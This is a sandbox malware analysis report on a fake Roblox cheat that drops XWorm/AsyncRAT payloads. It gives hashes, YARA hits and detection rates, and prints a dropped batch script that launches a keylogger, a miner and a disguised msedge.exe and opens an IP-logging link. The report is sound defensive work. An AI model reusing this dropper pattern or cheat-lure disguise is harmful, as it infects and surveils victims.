• Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, clientsettingscdn.roblox.com.edgekey.net, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, e7229.f.akamaiedge.net, clients.l.google.com
• Execution Graph export aborted for target roblox cheat.exe, PID 1952 because it is empty
• Not all processes were analyzed; report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: roblox cheat.exe
Time | Type | Description
18:55:09 | API Interceptor | 830696x Sleep call for process: robloxPX1instaler.exe modified
Input:
URL: https://2no.co/24RXx6
Model: Perplexity: mixtral-8x7b-instruct
Title: Branded Short Domain
OCR: *landshake We value your privacy This link was created by the user of URL Shortener Service IPLagger_ By clicking on this link, you can give your consent to the provision ot your personal data, SUCII as IP address, browser type anc operating system and other data, as well as using cookies to IPLogger, as well as to its partners and users. You can learn more about data processing and removing your data in IPLogger Privacy Policy. You can also follow this link without any data being recorded and processed. We value your privacy, that is why we are seeking your consent prior to collecting any Cata. Agree & Continue Ey clicking on "Agree & Continuer you egree with the Privazpolicy. I Terms &. Conditions For continue without consent click here
Output:
{"loginform": false,"urgency": false,"captcha": false,"reasons": ["The webpage does not contain a login form, as there are no explicit requests for sensitive information such as passwords, email addresses, usernames, phone numbers, or credit card numbers.","The text does not create a sense of urgency, as there are no phrases that encourage immediate action such as 'Click here to view document' or 'To view secured document click here'.","The webpage does not contain a CAPTCHA or any other anti-robot detection mechanism.","The webpage informs the user about the collection and processing of their data, and provides a link to the privacy policy and terms and conditions."]}
                                                                        RdJ73GU3N1.exeGet hashmaliciousNjratBrowse
                                                                        • 128.116.21.4
                                                                        SecuriteInfo.com.Win32.BackdoorX-gen.25355.5373.exeGet hashmaliciousUnknownBrowse
                                                                        • 128.116.21.4
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        28a2c9bd18a11de089ef85a160da29e4https://liupseerio-f45e48.ingress-baronn.ewp.live/wp-content/mu-plugins/dibinan/pages/region.phpGet hashmaliciousUnknownBrowse
                                                                        • 184.28.90.27
                                                                        • 20.114.59.183
                                                                        • 20.12.23.50
                                                                        http://metemiskalogio.gitbook.io/usGet hashmaliciousUnknownBrowse
                                                                        • 184.28.90.27
                                                                        • 20.114.59.183
                                                                        • 20.12.23.50
                                                                        https://chattts-49f1.beszyrecala.workers.dev/26d0111e-bce1-4044-b6b4-e1=Get hashmaliciousUnknownBrowse
                                                                        • 184.28.90.27
                                                                        • 20.114.59.183
                                                                        • 20.12.23.50
                                                                        https://att-net-6cf915.webflow.io/Get hashmaliciousUnknownBrowse
                                                                        • 184.28.90.27
                                                                        • 20.114.59.183
                                                                        • 20.12.23.50
                                                                        cheat_roblox.exeGet hashmaliciousXWormBrowse
                                                                        • 184.28.90.27
                                                                        • 20.114.59.183
                                                                        • 20.12.23.50
                                                                        http://pub-2fad846527d7473aa1d1ed2a45595d9d.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                        • 184.28.90.27
                                                                        • 20.114.59.183
                                                                        • 20.12.23.50
                                                                        http://ipfs.io/ipfs/QmdV2HGdtwWnonRSvaFvw4QTsSJKp6SREdhoc9BgEawLxT/Karyo.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                        • 184.28.90.27
                                                                        • 20.114.59.183
                                                                        • 20.12.23.50
                                                                        https://kapitan.co.ke/ch/f/signin.phpGet hashmaliciousUnknownBrowse
                                                                        • 184.28.90.27
                                                                        • 20.114.59.183
                                                                        • 20.12.23.50
                                                                        http://2323.pages.dev/Get hashmaliciousUnknownBrowse
                                                                        • 184.28.90.27
                                                                        • 20.114.59.183
                                                                        • 20.12.23.50
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\Keyloger.exe | Keyloger.exe | malicious | XWorm
C:\Users\user\AppData\Local\Temp\Keyloger.exe | cheat_roblox.exe | malicious | XWorm
C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | cheat_roblox.exe | malicious | XWorm
C:\Users\user\AppData\Local\Temp\ msedge.exe | cheat_roblox.exe | malicious | XWorm
Process: C:\Users\user\Desktop\roblox cheat.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 522
Entropy (8bit): 5.358731107079437
Encrypted: false
SSDEEP: 12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
MD5: 93E4C46884CB6EE7CDCC4AACE78CDFAC
SHA1: 29B12D9409BA9AFE4C949F02F7D232233C0B5228
SHA-256: 2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
SHA-512: E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
Malicious: true
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

Process: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe
File Type: Unicode text, UTF-8 text, with CRLF line terminators
Category: dropped
Size (bytes): 233235
Entropy (8bit): 6.025218023713329
Encrypted: false
SSDEEP: 3072:OhGvwW6Jj7ITWYv0yoVH283rz9WqIAsjjg4DsUQS88UP4TFf3xVOVkCC554jMN/C:M5W+j8chWf8xyvp5iIzB4CNxza/MK
MD5: 0194EB945475F93844C0FAE769C0FA0B
SHA1: D72876A801C702348EA5B4B4A333C484F2A721FD
SHA-256: A6BC06B8255E4AFE2EEFF34684605D04DF9EC246FC201BF5E44137987189A0D3
SHA-512: 72A00FE6B9111CAB22F1F424F815A617BE2041A3857A6265B004CA1BFD10F345CA33369CD43009B483F9436CCBCD69C70F7033A85D94527B1F39846B75B43C17
Malicious: false
Preview: ##..## Bundle of CA Root Certificates..##..## Certificate data from Mozilla as of: Mon Mar 11 15:25:27 2024 GMT..##..## This is a bundle of X.509 certificates of public Certificate Authorities..## (CA). These were automatically extracted from Mozilla's root certificates..## file (certdata.txt). This file can be found in the mozilla source tree:..## https://hg.mozilla.org/releases/mozilla-release/raw-file/default/security/nss/lib/ckfw/builtins/certdata.txt..##..## It contains the certificates in PEM format and therefore..## can be directly used with curl / libcurl / php_curl, or with..## an Apache+mod_ssl webserver for SSL client authentication...## Just configure this file as the SSLCACertificateFile...##..## Conversion done with mk-ca-bundle.pl version 1.29...## SHA256: 4d96bd539f4719e9ace493757afbe4a23ee8579de1c97fbebc50bba3c12e8c1e..##......GlobalSign Root CA..==================..-----BEGIN CERTIFICATE-----..MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkGA1UEBhMCQk

Process: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 2391
Entropy (8bit): 5.309404675837622
Encrypted: false
SSDEEP: 48:D0/J4ZdvP4DSGFkir0fZvxHOgZ6ubEgZ6ubHgZ6ubmKLYZJjK4z/HY5Wy5ssZZYu:8gSC8Q858HR3rQlAhJ0iJS
MD5: D2317281B593C3526836EF471F6F76B6
SHA1: 6985AB2FE7F824863C4C8C28201D37EE359C56E8
SHA-256: 5FFBCFE9926B5963E543CCD2C0BEB7E32F1376DF21E2473FE83DAB0137F6CD5C
SHA-512: B40981F9A20A64C273182061E878E751B08A6E6B8B0775E9535D10F0D8C9FF8A2480375F30C021A8720E174E4B81C583656E4EB451FB60299FD18FFF8FEBF9C0
Malicious: false
Preview: 2024-07-29T22:54:24.892Z..2024-07-29T22:54:24.070Z,0.070538,149c,6,Info [FLog::DesktopInstaller] The installer reporter is initialized..2024-07-29T22:54:24.070Z,0.070604,149c,6,Info [FLog::DesktopInstaller] Reporting Installer Start..2024-07-29T22:54:25.423Z,1.423282,1c08,6,Info [FLog::DesktopInstaller] Start the Installer thread..2024-07-29T22:54:25.543Z,1.543512,1c08,6,Info [FLog::DesktopInstaller] The installer will run InstallNormal..2024-07-29T22:54:25.543Z,1.543583,1c08,6,Info [FLog::DesktopInstaller] Fetch flag info..2024-07-29T22:54:26.305Z,2.305960,15a8,6,Critical [FLog::DesktopInstaller] failed Http GET url: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper, code: 11, message: HttpError: TlsVerificationFail, body: ..2024-07-29T22:55:11.272Z,47.272144,15a8,6,Critical [FLog::DesktopInstaller] failed Http GET url: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper, code: 11, message: HttpError: TlsVerificationFail, b

Process: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 166912
Entropy (8bit): 6.251413929646261
Encrypted: false
SSDEEP: 3072:TmnOFd9UhOMQRUGKXs+S++7KFSbxeY+qDDrMK:3d9YGqStKEbxI
MD5: D653AEF66E218FB009B43365919BBCE3
SHA1: D38CAFCD950B901EE79FF72EBB87FEC8B2D9582A
SHA-256: E85AF6A36635490B2FC2793B50C7EBC841DA95BC202A5FC9E7A4DBB17F172A2B
SHA-512: FF4776B44ACD815251908B7D726980FA9DE5E02AED32026C5A72B64A7B0A464399BE730EE37473FDE3406AE7D7D43284018ADE4D32FC160F579764344DA06EF6
Malicious: true
Yara Hits:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, Author: ditekSHen
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 76%
Joe Sandbox View:
• Filename: cheat_roblox.exe, Detection: malicious

Process: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 140288
Entropy (8bit): 5.566968845764678
Encrypted: false
SSDEEP: 3072:6mnOFd9U8OM+fe295liNgTddwY0JwsR4TbswYqkX5bEdGDOjESHhddJWjjY/ffIo:Wd9UH95D
MD5: 3AFF3B824FC5BCD05EF4D8EEE176E443
SHA1: 422883493E21D605CB47CC08FD48CAEAD73F414C
SHA-256: 79750B0F34A49A75406A0D7D6949AFD83DF2B2FF946E35A94AEA6BFE1D399599
SHA-512: 126818953B72233B2B0C50523ACE1EA8D1004F80EEDD0414A4FD3E4E385A3CB1D29E3D9BF7B50FA28AE5CC8EF2BF543D6416531F05FB977A79E60E51A82B03AE
Malicious: true
Yara Hits:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, Author: ditekSHen
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 76%
Joe Sandbox View:
• Filename: cheat_roblox.exe, Detection: malicious

Process: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 168960
Entropy (8bit): 5.30703099621005
Encrypted: false
SSDEEP: 3072:PV8w386j+bSL1OGtLJBz65/M6If+3Js+3JFkKeTnY:PN6bsrxBt25
MD5: 520E97797B27B752130B3E982953CEAF
SHA1: AB460DA7E69D43747D98A4F45F5BB09D0E971789
SHA-256: 8BC3BD8F0FF442D3C83DA8ED7DE13C8E44D095823E2480465BE866C08F7E8700
SHA-512: 3219E4FE6B23411B48930FCE21DA24C8CE9BB07C6B069FA38B26B32DCC102C668F32AE816BD526CFBB44480F8279586509EBB11E9B75138A1F59AE771AA53664
Malicious: true
Yara Hits:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, Author: ditekSHen
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 82%
Joe Sandbox View:
• Filename: Keyloger.exe, Detection: malicious
• Filename: cheat_roblox.exe, Detection: malicious

Process: C:\Users\user\Desktop\roblox cheat.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 630062
Entropy (8bit): 7.130280084277062
Encrypted: false
SSDEEP: 12288:yyveQB/fTHIGaPkKEYzURNAwbAgOT+t1/l36KUU0TetYsO3IB/m+:yuDXTIGaPhEYzUzA0bZB0gOY9z
MD5: FC411F4D9F4DBA5104CB1549153A8684
SHA1: A4591F154FBC922A8409A1C010DF6706F69A95E8
SHA-256: 28A6ACCC3134DDD287CA1C37D2C136C39255EF1654475F1E4DBC511F9D0EA35D
SHA-512: 000681D2C7A1AFA4BAA5470F6C46349B021C88F3D070BCEACBF0F2B6A6BAC6FF3F1E4F31729DB619C8E455FDF3B810662E24C446DC76F73E5C0DAD2DD6536C0B
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 61%

Process: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 517
Entropy (8bit): 5.103767602316603
Encrypted: false
SSDEEP: 12:Z0DtzHGtzs22yZOVqZwGJbShOVqZwGJbKy5intuAfhH0HR:ZMz0zsBiO4Z+O4ZOKuPfQR
MD5: DE26F0FF06A38A22766F3978775B13BD
SHA1: A845EBED70BF63BD700B0AFF5418ECA6CC9177ED
SHA-256: 8902A3F7733E13FDA8183E490550D22C8711CF30B5661CB554579C1F47A0609A
SHA-512: 8EEE58C2312F3488EE86F50E84CB854189254753A265B7E52C564ECA5A3C0836CD059B9540DADD531EED948AEBC1F88D4B7D466780FEB8C39F7E56DDC89D22B1
Malicious: false
Preview (CRLF separators shown as line breaks):
    %echo off
    copy %temp%\msedge.exe %systemDrive%\Program Files (x86)\Microsoft\Edge\Application
    start %systemDrive%\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    copy %temp%\BitCoin_miner.exe %userprofile%\AppData\Local\Roblox\Versions\version-2e10d35f26294ab6
    start %userprofile%\AppData\Local\Roblox\Versions\version-2e10d35f26294ab6\BitCoin_miner
    copy %temp%\Keyloger.exe %systemDrive%\Program Files (x86)
    start %systemDrive%\Program Files (x86)\Keyloger.exe
    start cmd
    start https://2no.co/24RXx6

Process: C:\Users\user\Desktop\roblox cheat.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 5720984
Entropy (8bit): 6.362394353465928
Encrypted: false
SSDEEP: 98304:v7v3kcOmmcMxGf3Yi4bg38mky2aB173qgDDzGxSP8R7fTA7pksuq7:70cB3djgmggDaRXAtHB
MD5: 27469372591B14FF1C57654FACB5E020
SHA1: 492C166CD0E6C8D122CA4687659BF047CD48AFD7
SHA-256: 3B8FCD52686095049B1563FBB6BA0BF73113A01B13C303BEBCB36D8339A1519F
SHA-512: 0CFA845DE57ACF6F17F295F0771C2A61CD846EFDEE79DA012DEF474BCAA91D9E99D3D528CF5698E6112A310C4F97E98AE74B6CFC601B2988C51E92270EBF92A2
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$..................M.....M...P.....9.......................9...M.....+.....M.....T............M.......O...T...(...T.;...S...T.....Rich....................PE..L................"......b4......... (/.......4...@..........................`......`/X...@.................................D.B.T....0..............."W..)......<[....@.p.....................@.......@.@.............4.<............................text...v`4......b4................. ..`.rdata..Rs....4..t...f4.............@..@.data....+....C..*....B.............@....rsrc........0........O.............@..@.reloc..<[.......\....T.............@..B................................................................................................................................................................................................................................................
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 29 21:54:43 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):2673
                                                                                Entropy (8bit):3.985988192942646
                                                                                Encrypted:false
                                                                                SSDEEP:48:8XjdKTAPHoidAKZdA1P4ehwiZUklqehqy+3:8s8iOFy
                                                                                MD5:A573E32B79E80E709038E2A044F7C09D
                                                                                SHA1:D4B185516CC06CB344744BE7C427BE3E3B3610FD
                                                                                SHA-256:F3056483F3B694B0665ADAFA3855241A429213DBC905C36066A54E4F402A88A8
                                                                                SHA-512:A3968604862A6D3225104149A2291DBA4A536D2C077863148E7B0A7AB8D1D4BBD1992591366A838A3B35BADB7B1914705C9AAE853A0218CDD49754FB9442E650
                                                                                Malicious:false
                                                                                Preview:L..................F.@.. ...$+.,......*M......v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X.....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X.....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X..............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.X............................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............ho.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 29 21:54:43 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):2675
                                                                                Entropy (8bit):4.001074407037593
                                                                                Encrypted:false
                                                                                SSDEEP:48:8rdKTAPHoidAKZdA1+4eh/iZUkAQkqeh1y+2:808DF9QYy
                                                                                MD5:8A96483F5A433A421554EC4BFDB1607F
                                                                                SHA1:92DC4BE2EE8E26CA5F3B07E32FE5F4005ACFE06E
                                                                                SHA-256:9C6F4BA405804D76438342C6A6B46A09C8FD4BF4CE241079AE28318FBD90A632
                                                                                SHA-512:20DAB0145249AADD5931ACACCCFC22CADF5BEE75080FF397182F8D07AE3AB75CEDB163AE2587CED2811EF129447D499BD9E7DB7970D07F1B4977F66C6DD0E21A
                                                                                Malicious:false
                                                                                Preview:L..................F.@.. ...$+.,.......M......v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X.....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X.....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X..............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.X............................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............ho.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:56:51 2023, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):2689
                                                                                Entropy (8bit):4.006283961881025
                                                                                Encrypted:false
                                                                                SSDEEP:48:8ydKTAVHoidAKZdA1404eh7sFiZUkmgqeh7s7y+BX:8X8IInBy
                                                                                MD5:A44405DFCEBA0352CDE5008AD94F000C
                                                                                SHA1:0EEF23947A6CE9DD544B4FE30AA9669F39B07786
                                                                                SHA-256:B94D3E47BF21DC3EE60A751B4230CB2D7FE544955CCE49AE2B2933923E6C754E
                                                                                SHA-512:86C8EE9F618D085E5494F5D88BFC6244415A11564A45C4B2E19780DF5A3B07F4EF47EE0427B870DA1B8F414F0A3F4682E5DDF67F0AE22D0D3FF5AF053505A152
                                                                                Malicious:false
                                                                                Preview:L..................F.@.. ...$+.,.....<}.i.....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X.....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X.....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X..............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.VEW.F...........................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............ho.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 29 21:54:43 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):2677
                                                                                Entropy (8bit):3.9986784601802787
                                                                                Encrypted:false
                                                                                SSDEEP:48:85dKTAPHoidAKZdA1p4ehDiZUkwqehJy+R:8O8U5jy
                                                                                MD5:2B49338422ABAEC8C1CFDDF580772C0E
                                                                                SHA1:CE37BFB477295DCD83D9E7965021667B9E2786CA
                                                                                SHA-256:7B7BE0F48309D29DA243E78A59F07B13EE1E2A0603B80D1F724D03AFD3E97093
                                                                                SHA-512:CEC46669F17997E65316F9BCEA46B9088819BAB1359D37B98D2BF74B527A0BB4271DBAEEB4312E3C90900C5C43A57AFB84B385C24810DACE53E5893A2E4F29DF
                                                                                Malicious:false
                                                                                Preview:L..................F.@.. ...$+.,....k..M......v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X.....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X.....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X..............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.X............................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............ho.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 29 21:54:43 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):2677
                                                                                Entropy (8bit):3.986461418473657
                                                                                Encrypted:false
                                                                                SSDEEP:48:8IdKTAPHoidAKZdA1X4ehBiZUk1W1qehHy+C:8B86b9ny
                                                                                MD5:CAFE09B6E4D1D2EC16EC183E52C4C678
                                                                                SHA1:C2DA6DFF7DB01E41DFFA2C52E5CC99F47BD28CA3
                                                                                SHA-256:12B3A94B52FA422D23295DD6D45882BD1A359A19BB0CF67257FBFD0CA629A0A1
                                                                                SHA-512:81A71592B8C89D4E1652EE3E1D4C75DB8F7FDC5A799E9C257C7C8611DF2A93D4AFC802EAF93AB535FE48CA34AF3A3FEF285EF8DA1E2B1E66575367555C26B170
                                                                                Malicious:false
                                                                                Preview:L..................F.@.. ...$+.,....R.$M......v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X.....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X.....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X..............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.X............................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............ho.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 29 21:54:43 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):2679
                                                                                Entropy (8bit):3.9958391477129274
                                                                                Encrypted:false
                                                                                SSDEEP:48:8pdKTAPHoidAKZdA1duTc4ehOuTbbiZUk5OjqehOuTbBy+yT+:8+8PTcJTbxWOvTbBy7T
                                                                                MD5:380902163E2D080D4365D17CC3FD2D7E
                                                                                SHA1:4F9F9D1AD31B2209615B67B16F701F9317665FD1
                                                                                SHA-256:D7689AF49252D34FE476162A8B5B5DF634EB45F2669A4DED03A3B3E342578E76
                                                                                SHA-512:2F8908760B077556B945DF918CE1545B102002329F600E92A78D96323442FA918948B1F2D04C4B73BAB829393954EE62569788BF5F692C4E67049CB78D52CA84
                                                                                Malicious:false
